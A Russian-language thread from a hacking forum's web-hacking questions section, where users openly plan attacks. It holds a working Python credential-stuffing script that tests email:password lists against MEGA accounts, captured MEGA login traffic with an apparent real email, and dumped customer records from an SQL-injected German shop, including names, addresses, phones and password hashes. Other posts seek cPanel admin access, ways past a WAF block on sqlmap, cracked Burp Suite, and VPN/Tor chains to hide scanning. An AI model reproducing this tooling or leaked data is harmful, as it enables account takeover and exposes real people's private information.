• XSS.stack #1 – первый литературный журнал от юзеров форума

[web-hacking] Ваши вопросы

Отслеживать
Shira сказал(а):
Can you give me a link?
github.com

GitHub - projectdiscovery/nuclei: Nuclei is a fast, customizable vulnerability scanner powered by the global security community and built on a simple YAML-based DSL, enabling collaboration to tackle trending vulnerabilities on the internet. It helps

Nuclei is a fast, customizable vulnerability scanner powered by the global security community and built on a simple YAML-based DSL, enabling collaboration to tackle trending vulnerabilities on the ...
github.com
/threads/85698
 
Хочу сделать на python брут mega под свои нужды. Взял с паблика брут и сохранил его запросы.
Подскажите, как кодировать пароль в пост запросе? В параметре "uh" кодируется пароль, каким-то алгоритмом который мне и нужен.

Код: 
POST https://g.api.mega.co.nz/cs?id=2886108801&ak=axhQiYyQ HTTP/1.1
Host: g.api.mega.co.nz
User-Agent: MegaApiClient/1.0
Content-Type: application/json
Content-Length: 45

[{"user":"abdeddinejad@gmail.com","a":"us0"}]

RESPONSE
HTTP/1.1 200 OK
Content-Type: application/json
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: Content-Type, MEGA-Chrome-Antileak
Access-Control-Expose-Headers: Original-Content-Length
Access-Control-Max-Age: 86400
Cache-Control: no-store
Original-Content-Length: 59
Content-Length: 59
Connection: keep-alive

[{"s":"_EL-jgiTJYqhjW1vPNPBj9GSWwLZ2GoKZtg6bGr73zo","v":2}]


POST https://g.api.mega.co.nz/cs?id=2886108802&ak=axhQiYyQ HTTP/1.1
Host: g.api.mega.co.nz
User-Agent: MegaApiClient/1.0
Content-Type: application/json
Content-Length: 85

[{"user":"abdeddinejad@gmail.com","uh":"mEizon7oY0ZA8DWqUYeM0Q","mfa":null,"a":"us"}]

RESPONSE
HTTP/1.1 200 OK
Content-Type: application/json
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: Content-Type, MEGA-Chrome-Antileak
Access-Control-Expose-Headers: Original-Content-Length
Access-Control-Max-Age: 86400
Cache-Control: no-store
Original-Content-Length: 1298
Content-Length: 1298
Connection: keep-alive

[{"csid":"CACEmKfzeXFaxtNgCk8KnpkVPR2Ojkm_COGTwzfpNQN9T2AzgCf3qYQrcBD9GDc3F6zWlUVutG-Qwdvc6gbnyICnhw7txosiBnR54GYj68_0WDC1oysukP6xv18d9BH-ZJLkQVYyvNIn4LDh_qOhnL91mj7Cp3hxHS0h7Q7XtApbHaMaKbJTUzejdNWQ2pTe_VXnev63AgsfjMtX2AHXuX4DQwEb9lcdsrWDxFdwqX44RopbZNzOjFrB5Bid1nxOqHSEqfzw1629yxwPU9Kyz0VNJgXzyfMjpVrIH1iWNo-UnbtzVWV62xQanR_fhgBNmSxjsOGBqwFz9Bld4QbPfeK8","privk":"pNct7htse-QUf4XOECb12U84r__54tP4XPfVUl7ec_9tZUaa0Ix1uu5-YA5TU_oSK1al1zI8VfmlLYjZ6GA2xbZYjIXrBfiEK4iZ-HKyLmAX-xjQv_VQ4TD8bI5jaMs9N8ruFaa0b3rzZX-DZOBhoG_ZEHgegdE9wK86uj_jhNLa6YxpbbUnH7Xb7rC9aMQzU1gpKvFfEl_FL1VglGWj0zS0qin9t7JEl8wGRUKpffH5wb6mhMuHgSBIb-M_bOGE5109MsBew1RBhs2FAxG8ulh78-XFwFZ8zyPFNx4JY7z7BKfHYZaXrWRtoNoyuwMvAx6pTMy8hbbU5kB2pmlNxo4sjJJU8Y1PqLhQEvt7gL0BXSruYWoydHbqJ_u1bFdDnPznT6G34l2b_pbZQlcd77jgU0lzhIeXDW0pmziUhin7NVkjqPsK2N9Hx4UhWWxDLXFFcdrA4H5GyXO-dBAx-xeQfkWW4bQGNhky5EnWkCVAZ4Bq8DtQjJdgrJ4fR-hTzyEtR7i37doAew3QXnJxvAYz15jB99eKZB4T6UXofUyb5kIXOwXbag22pjrP9yLOQez0yIzSE7xQnk_xElRYtBsLlWvIUCoo04lTWjY-Q4DeYSVd6uhPASLzutLg-Wp21QDOu9skXsQmS5ftou5x53c51_EjwWKA6xi9AKJutya2aNqrdJl84Bqo73_f-zow3twJy0yubl3AohGb1h9O_dRkIoxo_Bi2zdPkXV6xTGiYfBYkaGdlIwbvFaGY1PZDwAnBxKpnfH7A8cTFOIYEAMhMRIUw7xnDI5sMyxcm_lA8MlCTGAIj_BNw3muVADV1T63A_3_Sb37A1PjhnJ5tLT0GKGPNsb9WrASSZiKTKRs","k":"Rz4tFfpATkTh26opBIe8Iw","u":"mYApwbr9iVg","ach":1}]

POST https://g.api.mega.co.nz/cs?id=2886108803&ak=axhQiYyQ&sid=c6SGGn1iB0veXkHrXKsyk21ZQXB3YnI5aVZnlIIQmSGpz2U-As8NDGoYaQ HTTP/1.1
Host: g.api.mega.co.nz
User-Agent: MegaApiClient/1.0
Content-Type: application/json
Content-Length: 38

[{"strg":1,"xfer":0,"pro":0,"a":"uq"}]

RESPONSE
HTTP/1.1 200 OK
Content-Type: application/json
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: Content-Type, MEGA-Chrome-Antileak
Access-Control-Expose-Headers: Original-Content-Length
Access-Control-Max-Age: 86400
Cache-Control: no-store
Original-Content-Length: 155
Content-Length: 155
Connection: keep-alive

[{"mstrg":21474836480,"cstrgn":{"iNUmiTLR":[1704354,2,0],"zYESABxK":[0,0,0],"CYcwkTZY":[0,0,0]},"cstrg":1704354,"uslw":9000,"srvratio":25.000381475547417}]

POST https://g.api.mega.co.nz/cs?id=2886108804&ak=axhQiYyQ&sid=c6SGGn1iB0veXkHrXKsyk21ZQXB3YnI5aVZnlIIQmSGpz2U-As8NDGoYaQ HTTP/1.1
Host: g.api.mega.co.nz
User-Agent: MegaApiClient/1.0
Content-Type: application/json
Content-Length: 13

[{"a":"sml"}]

RESPONSE
HTTP/1.1 200 OK
Content-Type: application/json
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: Content-Type, MEGA-Chrome-Antileak
Access-Control-Expose-Headers: Original-Content-Length
Access-Control-Max-Age: 86400
Cache-Control: no-store
Original-Content-Length: 3
Content-Length: 3
Connection: keep-alive

[0]
 
есть шоп с уязвимой скулей -> права:usage ,все таблицы и колонки крутятся,нашёл там backup2017 с юзерами вот такого плана:

1.ua_ustid,ua_tempid,ua_plz,ua_land,ua_cart1,ua_cart2,ua_cart3,ua_datum,ua_email,ua_firma,ua_mobil,ua_anrede,ua_author,ua_noedit,ua_rabatt,ua_status,ua_tempip,ua_vindex,ua_endtime,ua_history,ua_telefon,ua_version,ua_vorname,ua_wohnort,ua_betauser,ua_nachname,ua_nodelete,ua_password,ua_username,ua_ustid_ok,ua_starttime,ua_tempagent,ua_anschrift1,ua_anschrift2,ua_lastupdate,ua_tempactivity,ua_activation_code,ua_activation_time,ua_version_refindex,ua_password_recovery,ua_cartcookielifetime,ua_kundennummer_intern

2.<blank>,143a8696288087e901c393644672ca34,61184,Deutschland#D,<blank>,<blank>,<blank>,2013-10-27 00:00:00,Pittfall@unitybox.de,<blank>,<blank>,<blank>,stephan,0,0,2,178.201.186.72,410001,2000-01-01 00:00:00,webuser;1;2013-10-27 18:54:16;10.0.0.1;121#####dino.pannozzo;2;2013-11-08 16:23:44;79.224.209.59;1065#####dino.pannozzo;2;2013-11-08 23:24:02;79.224.209.59;1065#####stephan;2;2014-10-15 17:56:00;79.233.93.169;1409#####,<blank>,0,Thomas,Karben,0,Schaffer,0,4e06d10efe30d013ae9f960ad09ae222,Pittfall,0,2013-01-01 00:00:00,"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_1) AppleWebKit/537.73.11 (KHTML, like Gecko) Version/7.0.1 Safari/537.73.11",Heitzhöfer Str. 5,<blank>,2014-10-15 17:56:00,2014-01-06 06:48:13,<blank>,0000-00-00 00:00:00,0,0,3600,<blank>

3.<blank>,6f6cd33048a89b3a197d45bd787e7547,71126,Deutschland#D,<blank>,<blank>,<blank>,2013-11-12 12:53:34,Axel@nahhas.de,<blank>,0160 9041 7801,Herr,webuser,0,0,2,217.228.46.173,410065,2025-01-01 00:00:00,webuser;1;2013-11-12 12:53:34;10.0.0.1;121#####dino.pannozzo;2;2013-11-13 11:57:15;217.251.200.31;1065#####webuser;2;2014-07-13 11:36:37;10.0.0.1;121#####webuser;2;2015-07-29 16:53:27;10.0.0.1;121#####stephan.schulz;2;2015-09-09 12:32:26;87.148.151.102;1409#####,<blank>,2,Axel, Gufelden,0,Szymanski,0,ed84b11dd3af85b16335dbe95625826c,Axel,0,2013-01-01 00:00:00,Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0),Jakobstrasse 16,<blank>,2013-11-12 12:53:34,2013-11-12 12:56:54,pd39hquxxr,2013-11-12 12:55:16,410052,0,3600,<blank>

тип уязвимостей:
Title: OR boolean-based blind - WHERE or HAVING clause
Title: MySQL >= 5.0.12 time-based blind - Parameter replace
Title: Generic UNION query (random number)


есть еще бэкапы ,но юзеры только в этом..понимаю что я археолог 🧌 подскажите есть ли какие-то варинаты попасть в админку?(cPanel)
 
при попытке эксплуатации скули через sqlmap выходит 403 ошибка , посмотрел пейлоады,вставил в браузер и выводит вот что: forbidden you don’t have permission to access /****.php on this server
Что с этим можно сделать?
 
Fireboy сказал(а):
I want to make a mega brute in python to suit my needs. I took a brut from the public and saved its requests.
Tell me how to encode a password in a post request? The parameter "uh" encodes the password using some algorithm that I need.

Код: 
POST https://g.api.mega.co.nz/cs?id=2886108801&ak=axhQiYyQ HTTP/1.1
Host: g.api.mega.co.nz
User-Agent: MegaApiClient/1.0
Content-Type: application/json
Content-Length: 45

[{"user":"abdeddinejad@gmail.com","a":"us0"}]

RESPONSE
HTTP/1.1 200 OK
Content-Type: application/json
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: Content-Type, MEGA-Chrome-Antileak
Access-Control-Expose-Headers: Original-Content-Length
Access-Control-Max-Age: 86400
Cache Control: no-store
Original-Content-Length: 59
Content-Length: 59
Connection: keep-alive

[{"s":"_EL-jgiTJYqhjW1vPNPBj9GSWwLZ2GoKZtg6bGr73zo","v":2}]


POST https://g.api.mega.co.nz/cs?id=2886108802&ak=axhQiYyQ HTTP/1.1
Host: g.api.mega.co.nz
User-Agent: MegaApiClient/1.0
Content-Type: application/json
Content-Length: 85

[{"user":"abdeddinejad@gmail.com","uh":"mEizon7oY0ZA8DWqUYeM0Q","mfa":null,"a":"us"}]

RESPONSE
HTTP/1.1 200 OK
Content-Type: application/json
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: Content-Type, MEGA-Chrome-Antileak
Access-Control-Expose-Headers: Original-Content-Length
Access-Control-Max-Age: 86400
Cache Control: no-store
Original-Content-Length: 1298
Content-Length: 1298
Connection: keep-alive

[{"csid":"CACEmKfzeXFaxtNgCk8KnpkVPR2Ojkm_COGTwzfpNQN9T2AzgCf3qYQrcBD9GDc3F6zWlUVutG-Qwdvc6gbnyICnhw7txosiBnR54GYj68_0WDC1oysukP6xv18d9BH-ZJLkQVYyvNIn4LDh_qOhnL91mj7Cp3hxHS0h7Q7XtApbHaMaKbJTUzejdNWQ2pTe_VXnev63AgsfjMtX2AHXuX4DQwEb9lcdsrWDxFdwqX44RopbZNzOjFrB5Bid1nxOqHSEqfzw1629yxwPU9Kyz0VNJgXzyfMjpVrIH1iWNo-UnbtzVWV62xQanR_fhgBNmSxjsOGBqwFz9Bld4QbPfeK8","privk":"pNct7htse-QUf4XOECb12U84r__54tP4XPfVUl7ec_9tZUaa0Ix1uu5-YA5TU_oSK1al1zI8VfmlLYjZ6GA2xbZYjIXrBfiEK4iZ-HKyLmAX-xjQv_VQ4TD8bI5jaMs9N8ruFaa0b3rzZX-DZOBhoG_ZEHgegdE9wK86uj_jhNLa6YxpbbUnH7Xb7rC9aMQzU1gpKvFfEl_FL1VglGWj0zS0qin9t7JEl8wGRUKpffH5wb6mhMuHgSBIb-M_bOGE5109MsBew1RBhs2FAxG8ulh78-XFwFZ8zyPFNx4JY7z7BKfHYZaXrWRtoNoyuwMvAx6pTMy8hbbU5kB2pmlNxo4sjJJU8Y1PqLhQEvt7gL0BXSruYWoydHbqJ_u1bFdDnPznT6G34l2b_pbZQlcd77jgU0lzhIeXDW0pmziUhin7NVkjqPsK2N9Hx4UhWWxDLXFFcdrA4H5GyXO-dBAx-xeQfkWW4bQGNhky5EnWkCVAZ4Bq8DtQjJdgrJ4fR-hTzyEtR7i37doAew3QXnJxvAYz15jB99eKZB4T6UXofUyb5kIXOwXbag22pjrP9yLOQez0yIzSE7xQnk_xElRYtBsLlWvIUCoo04lTWjY-Q4DeYSVd6uhPASLzutLg-Wp21QDOu9skXsQmS5ftou5x53c51_EjwWKA6xi9AKJutya2aNqrdJl84Bqo73_f-zow3twJy0yubl3AohGb1h9O_dRkIoxo_Bi2zdPkXV6xTGiYfBYkaGdlIwbvFaGY1PZDwAnBxKpnfH7A8cTFOIYEAMhMRIUw7xnDI5sMyxcm_lA8MlCTGAIj_BNw3muVADV1T63A_3_Sb37A1PjhnJ5tLT0GKGPNsb9WrASSZiKTKRs","k":"Rz4tFfpATkTh26opBIe8Iw","u":"mYApwbr9iVg","ach":1}]

POST https://g.api.mega.co.nz/cs?id=2886108803&ak=axhQiYyQ&sid=c6SGGn1iB0veXkHrXKsyk21ZQXB3YnI5aVZnlIIQmSGpz2U-As8NDGoYaQ HTTP/1.1
Host: g.api.mega.co.nz
User-Agent: MegaApiClient/1.0
Content-Type: application/json
Content-Length: 38

[{"strg":1,"xfer":0,"pro":0,"a":"uq"}]

RESPONSE
HTTP/1.1 200 OK
Content-Type: application/json
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: Content-Type, MEGA-Chrome-Antileak
Access-Control-Expose-Headers: Original-Content-Length
Access-Control-Max-Age: 86400
Cache Control: no-store
Original-Content-Length: 155
Content-Length: 155
Connection: keep-alive

[{"mstrg":21474836480,"cstrgn":{"iNUmiTLR":[1704354,2,0],"zYESABxK":[0,0,0],"CYcwkTZY":[0,0,0]},"cstrg":1704354,"uslw":9000,"srvratio":25.000381475547417}]

POST https://g.api.mega.co.nz/cs?id=2886108804&ak=axhQiYyQ&sid=c6SGGn1iB0veXkHrXKsyk21ZQXB3YnI5aVZnlIIQmSGpz2U-As8NDGoYaQ HTTP/1.1
Host: g.api.mega.co.nz
User-Agent: MegaApiClient/1.0
Content-Type: application/json
Content-Length: 13

[{"a":"sml"}]

RESPONSE
HTTP/1.1 200 OK
Content-Type: application/json
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: Content-Type, MEGA-Chrome-Antileak
Access-Control-Expose-Headers: Original-Content-Length
Access-Control-Max-Age: 86400
Cache Control: no-store
Original-Content-Length: 3
Content-Length: 3
Connection: keep-alive

[0]
just use mega's python api

Python: 
from mega import Mega
import argparse
import colorama
from colorama import Fore, Style

# Initialize colorama for Windows
colorama.init()

# ANSI escape codes for colors
RED = Fore.RED
GREEN = Fore.GREEN
YELLOW = Fore.YELLOW
RESET = Style.RESET_ALL

def check_account(email, password, verbose):
    mega = Mega()
    try:
        m = mega.login(email, password)
        balance = m.get_balance()
        if balance:
            print(f"{GREEN}[+] {email} Balance: {balance}{RESET}")
        else:
            print(f"{YELLOW}[+] {email} No balance{RESET}")

    except Exception as e:
        if "Invalid credentials" in str(e):
            print(f"{RED}[-] {email} Invalid credentials{RESET}")

def read_credentials(file_path):
    with open(file_path, "r") as f:
        lines = f.readlines()
    credentials = []
    for line in lines:
        line = line.strip()
        if line and ":" in line:
            parts = line.split(":", 1)  # Split only once
            if len(parts) == 2:  # Check if there are exactly two parts
                email, password = parts
                credentials.append((email, password))
            else:
                print(f"Skipping malformed line: {line}")
    return credentials


# Parse command-line arguments
parser = argparse.ArgumentParser(description="Check MEGA accounts")
parser.add_argument("-f", "--file", required=True, help="Path to the credentials file")
parser.add_argument("-v", "--verbose", action="store_true", help="Display account details")
args = parser.parse_args()

# Read credentials from the specified file
credentials = read_credentials(args.file)

# Check each account
for email, password in credentials:
    check_account(email, password, args.verbose)
 
подскажите пожалуйста бесплатное решение прогнать линки , что то из новенького и бесплатного) по типу всяких мульти тулс и икс админов, для автаматического, и при помоши паука по поиску SQL Injection , под линукс тоже подойдет. короче говоря просто прогнать линки на наличие скуль . Спасибо
 
mayone сказал(а):
подскажите пожалуйста бесплатное решение прогнать линки , что то из новенького и бесплатного) по типу всяких мульти тулс и икс админов, для автаматического, и при помоши паука по поиску SQL Injection , под линукс тоже подойдет. короче говоря просто прогнать линки на наличие скуль . Спасибо
nuclei, acunetix
 
Carbon сказал(а):
Есть ли ,что то лучше чем burp suite на данный момент на рынке?
есть аналоги, но большинство предпочитают burp, на гите можешь кряк найти. может и тут есть тема.
 
gnida0 сказал(а):
есть аналоги, но большинство предпочитают burp, на гите можешь кряк найти. может и тут есть тема.
Вы про версию от Pwn3rzs? Если да, то там только 2023.6.1 попытки обновиться до новой версии с тем кряком не увенчались успехом. Может у меня руки кривые и как-то можно обновиться? Или есть более свежий кряк?
 
petrinh1988 сказал(а):
Вы про версию от Pwn3rzs? Если да, то там только 2023.6.1 попытки обновиться до новой версии с тем кряком не увенчались успехом. Может у меня руки кривые и как-то можно обновиться? Или есть более свежий кряк?
Что-то не то ты делаешь. Все работает со старыми кряками.
Click to download > Скачивается последняя версия > Закидываешь ее в папку со старой > Старую удаляешь.
678.png
 
c0d3x сказал(а):
Что-то не то ты делаешь. Все работает со старыми кряками.
Click to download > Скачивается последняя версия > Закидываешь ее в папку со старой > Старую удаляешь.
Посмотреть вложение 83934
Видимо что-то не так делаю. Хотя по пунктам все тоже самое и делал. Сносил старую, копировал новую. Когда ставил новую, Берп не запускался вовсе. Экран стартовый мигал и все, аривидерчи. Попробую еще раз. Может старую не удалил, а переименовал.... это может быть, как вариант, просто уже не помню момент.
 
Как грамотно скрыть трафик от провайдера при 24/7 работе сканеров по поиску уязвимостей (Acunetix,HCL и тд )?
есть идея поставить мощный комп на работе с хорошим интернетом ,и на нем нон стоп будут работать сканеры.
В последнее время часто лочат акки VPS за скан ,хочу сделать свой мини сервер
 
Carbon сказал(а):
Как грамотно скрыть трафик от провайдера при 24/7 работе сканеров по поиску уязвимостей (Acunetix,HCL и тд )?
есть идея поставить мощный комп на работе с хорошим интернетом ,и на нем нон стоп будут работать сканеры.
В последнее время часто лочат акки VPS за скан ,хочу сделать свой мини сервер
несколько страниц назад подробно описывали -> /threads/14482/page-52
 
c0d3x сказал(а):
Что-то не то ты делаешь. Все работает со старыми кряками.
Click to download > Скачивается последняя версия > Закидываешь ее в папку со старой > Старую удаляешь.
Посмотреть вложение 83934
Разобрался. Нужно быть внимательнее. Когда ставил, помню было в инструкции указание, что нужен именно 17-й JDK. Вот у меня и получалось, что при запуске экран стартовый на секунду показывался и все... даже в логах ошибки не было. Присмотрелся к вашему скрину, у вас 22-й стоит. Обновился, теперь все шикарно работает.
 
xargs сказал(а):
1) белый впн - 2) тор - 3) серый впн или цепочка проксей в ротацию.
Ну для сканера важна скорость интернета
Как быть с ней при такой связке ?
 
petrinh1988 сказал(а):
Вы про версию от Pwn3rzs? Если да, то там только 2023.6.1 попытки обновиться до новой версии с тем кряком не увенчались успехом. Может у меня руки кривые и как-то можно обновиться? Или есть более свежий кряк?
А есть ли смысл выше обновляться? Новые фичи не добавляются, сканнером не пользуюсь
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх